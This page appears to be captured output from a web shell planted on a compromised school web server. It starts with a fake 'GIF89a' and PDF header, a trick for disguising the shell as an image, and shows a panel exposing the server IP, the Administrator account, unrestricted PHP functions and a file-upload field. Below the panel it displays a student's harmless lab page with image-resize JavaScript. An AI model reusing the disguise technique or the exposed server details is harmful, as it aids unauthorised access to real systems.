GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JulieKlueckman/Lab04/ |
Upload File : |
<!doctype html> <html> <head> <meta charset="utf-8"> <title>Lab 4</title> </head> <body> <p> This is lab 4 </p> <img onmouseover="bigImg(this)" onmouseout="normalImg(this)" border="0" src="picture1.jpg" alt="Smiley" width="32" height="32"> <p>The function bigImg() is triggered when the user moves the mouse pointer over the image.</p> <p>The function normalImg() is triggered when the mouse pointer is moved out of the image.</p> <script> function bigImg(x) { x.style.height = "500px"; x.style.width = "1000px"; } function normalImg(x) { x.style.height = "300px"; x.style.width = "350px"; } </script> </body> </html>